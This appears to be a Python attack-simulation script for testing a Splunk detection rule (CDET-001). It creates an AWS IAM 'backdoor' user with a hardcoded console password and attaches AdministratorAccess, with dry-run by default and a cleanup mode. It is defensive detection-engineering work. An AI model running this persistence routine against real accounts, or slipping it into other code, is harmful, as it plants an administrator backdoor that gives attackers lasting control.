#!/usr/bin/env python3
"""
╔══════════════════════════════════════════════════════════════════════════════╗
║              ATTACK SIMULATION — AUTHORIZED USE ONLY                        ║
║  CDET-001: IAM User Created Outside Approved Pipeline                        ║
║  Tactic: Persistence | T1136.003 — Create Account: Cloud Account             ║
║                                                                              ║
║  This script simulates adversary persistence via backdoor IAM user creation. ║
║  Run ONLY in authorized test environments with explicit written approval.    ║
║  Unauthorized use against production systems may violate computer fraud laws.║
╚══════════════════════════════════════════════════════════════════════════════╝

Usage:
    # Dry-run (default — prints actions only, makes no AWS calls):
    python simulate.py --username svc-backdoor-test

    # Execute mode (makes real AWS API calls):
    python simulate.py --username svc-backdoor-test --execute

    # Execute with cleanup afterward:
    python simulate.py --username svc-backdoor-test --execute --cleanup

    # Cleanup only (remove a previously created test user):
    python simulate.py --username svc-backdoor-test --execute --cleanup-only
"""

import argparse
import logging
import sys
import time
from typing import Optional

import boto3
from botocore.exceptions import ClientError

# ---------------------------------------------------------------------------
# Logging setup
# ---------------------------------------------------------------------------
logging.basicConfig(
    format="%(asctime)s [%(levelname)s] %(name)s — %(message)s",
    datefmt="%Y-%m-%dT%H:%M:%SZ",
    level=logging.INFO,
    stream=sys.stdout,
)
log = logging.getLogger("cdet001-sim")

# ---------------------------------------------------------------------------
# CloudTrail events this simulation generates
# ---------------------------------------------------------------------------
CLOUDTRAIL_EVENTS = [
    "iam:CreateUser            → eventName=CreateUser",
    "iam:CreateLoginProfile    → eventName=CreateLoginProfile",
    "iam:AttachUserPolicy      → eventName=AttachUserPolicy",
    "iam:CreateAccessKey       → eventName=CreateAccessKey  (if --with-key flag used)",
]

ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"


# ---------------------------------------------------------------------------
# Core simulation functions
# ---------------------------------------------------------------------------

def print_cloudtrail_events() -> None:
    """Print the CloudTrail events that will be (or were) generated."""
    log.info("CloudTrail events generated by this simulation:")
    for event in CLOUDTRAIL_EVENTS:
        log.info("  %s", event)


def create_iam_user(
    iam_client,
    username: str,
    dry_run: bool,
) -> Optional[str]:
    """
    Create a backdoor IAM user.

    Returns the user ARN on success, None on failure.
    """
    if dry_run:
        log.info("[DRY-RUN] Would call: iam.create_user(UserName='%s')", username)
        log.info("[DRY-RUN] Would call: iam.create_login_profile(UserName='%s', Password=..., PasswordResetRequired=False)", username)
        return f"arn:aws:iam::DRY-RUN-ACCOUNT:user/{username}"

    # WARNING: This creates a real IAM user in your AWS account.
    log.warning("EXECUTING: iam.create_user(UserName='%s') — this is a real write operation", username)
    try:
        response = iam_client.create_user(
            UserName=username,
            Tags=[
                {"Key": "CreatedBy", "Value": "CDET001-Simulation"},
                {"Key": "SimulationId", "Value": "CDET-001"},
                {"Key": "SafeToDelete", "Value": "true"},
            ],
        )
        user_arn = response["User"]["Arn"]
        log.info("Created IAM user: %s", user_arn)

        # WARNING: This enables console access for the new user.
        log.warning("EXECUTING: iam.create_login_profile() — enabling console access")
        iam_client.create_login_profile(
            UserName=username,
            Password="Cdet001-Temp-Pass!99",
            PasswordResetRequired=False,
        )
        log.info("Enabled console access (login profile) for: %s", username)
        return user_arn

    except ClientError as exc:
        log.error("Failed to create IAM user '%s': %s", username, exc)
        return None


def attach_admin_policy(
    iam_client,
    username: str,
    dry_run: bool,
) -> bool:
    """
    Attach AdministratorAccess managed policy to the user.

    WARNING: This grants full AWS administrative access.
    """
    if dry_run:
        log.info(
            "[DRY-RUN] Would call: iam.attach_user_policy(UserName='%s', PolicyArn='%s')",
            username,
            ADMIN_POLICY_ARN,
        )
        return True

    # WARNING: This grants AdministratorAccess to the IAM user.
    log.warning(
        "EXECUTING: iam.attach_user_policy — attaching AdministratorAccess to '%s'",
        username,
    )
    try:
        iam_client.attach_user_policy(
            UserName=username,
            PolicyArn=ADMIN_POLICY_ARN,
        )
        log.info("Attached AdministratorAccess to user: %s", username)
        return True
    except ClientError as exc:
        log.error("Failed to attach policy to '%s': %s", username, exc)
        return False


def cleanup_user(
    iam_client,
    username: str,
    dry_run: bool,
) -> None:
    """
    Remove all simulation artifacts: detach policies, delete login profile,
    delete access keys, and delete the IAM user.
    """
    if dry_run:
        log.info("[DRY-RUN] Cleanup would remove:")
        log.info("[DRY-RUN]   iam.detach_user_policy(UserName='%s', PolicyArn='%s')", username, ADMIN_POLICY_ARN)
        log.info("[DRY-RUN]   iam.delete_login_profile(UserName='%s')", username)
        log.info("[DRY-RUN]   iam.delete_access_key() for all keys")
        log.info("[DRY-RUN]   iam.delete_user(UserName='%s')", username)
        return

    log.info("Starting cleanup for user: %s", username)

    # Detach managed policies
    try:
        attached = iam_client.list_attached_user_policies(UserName=username)
        for policy in attached.get("AttachedPolicies", []):
            log.warning("EXECUTING: Detaching policy '%s' from '%s'", policy["PolicyArn"], username)
            iam_client.detach_user_policy(UserName=username, PolicyArn=policy["PolicyArn"])
            log.info("Detached policy: %s", policy["PolicyArn"])
    except ClientError as exc:
        log.warning("Could not list/detach policies for '%s': %s", username, exc)

    # Delete inline policies
    try:
        inline_policies = iam_client.list_user_policies(UserName=username)
        for policy_name in inline_policies.get("PolicyNames", []):
            log.warning("EXECUTING: Deleting inline policy '%s' from '%s'", policy_name, username)
            iam_client.delete_user_policy(UserName=username, PolicyName=policy_name)
    except ClientError as exc:
        log.warning("Could not list/delete inline policies for '%s': %s", username, exc)

    # Delete login profile
    try:
        log.warning("EXECUTING: iam.delete_login_profile(UserName='%s')", username)
        iam_client.delete_login_profile(UserName=username)
        log.info("Deleted login profile for: %s", username)
    except ClientError as exc:
        if exc.response["Error"]["Code"] != "NoSuchEntity":
            log.warning("Could not delete login profile for '%s': %s", username, exc)

    # Delete access keys
    try:
        keys = iam_client.list_access_keys(UserName=username)
        for key in keys.get("AccessKeyMetadata", []):
            key_id = key["AccessKeyId"]
            log.warning("EXECUTING: Deleting access key '%s' for '%s'", key_id, username)
            iam_client.delete_access_key(UserName=username, AccessKeyId=key_id)
            log.info("Deleted access key: %s", key_id)
    except ClientError as exc:
        log.warning("Could not list/delete access keys for '%s': %s", username, exc)

    # Remove from groups
    try:
        groups = iam_client.list_groups_for_user(UserName=username)
        for group in groups.get("Groups", []):
            log.warning("EXECUTING: Removing '%s' from group '%s'", username, group["GroupName"])
            iam_client.remove_user_from_group(UserName=username, GroupName=group["GroupName"])
    except ClientError as exc:
        log.warning("Could not remove '%s' from groups: %s", username, exc)

    # Delete the user
    try:
        log.warning("EXECUTING: iam.delete_user(UserName='%s')", username)
        iam_client.delete_user(UserName=username)
        log.info("Deleted IAM user: %s", username)
    except ClientError as exc:
        log.error("Failed to delete user '%s': %s", username, exc)


# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="CDET-001: Simulate IAM backdoor user creation (persistence technique T1136.003)",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python simulate.py --username svc-backdoor-test
  python simulate.py --username svc-backdoor-test --execute
  python simulate.py --username svc-backdoor-test --execute --cleanup
  python simulate.py --username svc-backdoor-test --execute --cleanup-only
        """,
    )
    parser.add_argument(
        "--username",
        type=str,
        default="svc-cdet001-simulation-user",
        help="IAM username to create as the backdoor (default: svc-cdet001-simulation-user)",
    )
    parser.add_argument(
        "--region",
        type=str,
        default="us-east-1",
        help="AWS region (default: us-east-1). IAM is global but region affects CloudTrail.",
    )
    parser.add_argument(
        "--execute",
        action="store_true",
        default=False,
        help="Actually execute AWS API calls. Without this flag, runs in dry-run mode.",
    )
    parser.add_argument(
        "--cleanup",
        action="store_true",
        default=False,
        help="Delete the created user after simulation (requires --execute)",
    )
    parser.add_argument(
        "--cleanup-only",
        action="store_true",
        default=False,
        help="Skip simulation, only clean up a previously created test user (requires --execute)",
    )
    return parser.parse_args()


def main() -> int:
    args = parse_args()
    dry_run = not args.execute

    if dry_run:
        log.info("=" * 70)
        log.info("DRY-RUN MODE — No AWS API calls will be made")
        log.info("Pass --execute to run the simulation for real")
        log.info("=" * 70)
    else:
        log.warning("=" * 70)
        log.warning("EXECUTE MODE — Real AWS API calls WILL be made")
        log.warning("Ensure you are running in an authorized test environment")
        log.warning("=" * 70)
        time.sleep(2)  # Brief pause to allow operator to cancel (Ctrl+C)

    # Build boto3 session using default credential chain (no hardcoded creds)
    session = boto3.Session(region_name=args.region)
    iam = session.client("iam")

    # Verify identity before proceeding
    sts = session.client("sts")
    try:
        identity = sts.get_caller_identity()
        log.info(
            "Running as: %s (Account: %s)",
            identity["Arn"],
            identity["Account"],
        )
    except ClientError as exc:
        log.error("Cannot determine caller identity: %s", exc)
        return 1

    print_cloudtrail_events()

    # Cleanup-only mode
    if args.cleanup_only:
        log.info("Cleanup-only mode: removing user '%s'", args.username)
        cleanup_user(iam, args.username, dry_run)
        return 0

    # --- Simulation Phase ---
    log.info("Phase 1: Creating backdoor IAM user '%s'", args.username)
    user_arn = create_iam_user(iam, args.username, dry_run)
    if user_arn is None:
        log.error("User creation failed — aborting simulation")
        return 1

    log.info("Phase 2: Escalating privileges — attaching AdministratorAccess")
    success = attach_admin_policy(iam, args.username, dry_run)
    if not success:
        log.warning("Policy attachment failed — user may exist without privileges")

    log.info("Simulation complete.")
    log.info("Expected CDET-001 alert should fire in Splunk within ~5 minutes.")
    log.info("Verify with: index=aws_cloudtrail eventName=CreateUser requestParameters.userName=%s", args.username)

    # --- Optional Cleanup ---
    if args.cleanup:
        log.info("Cleanup requested — waiting 30 seconds for CloudTrail event propagation...")
        if not dry_run:
            time.sleep(30)
        cleanup_user(iam, args.username, dry_run)

    return 0


if __name__ == "__main__":
    sys.exit(main())
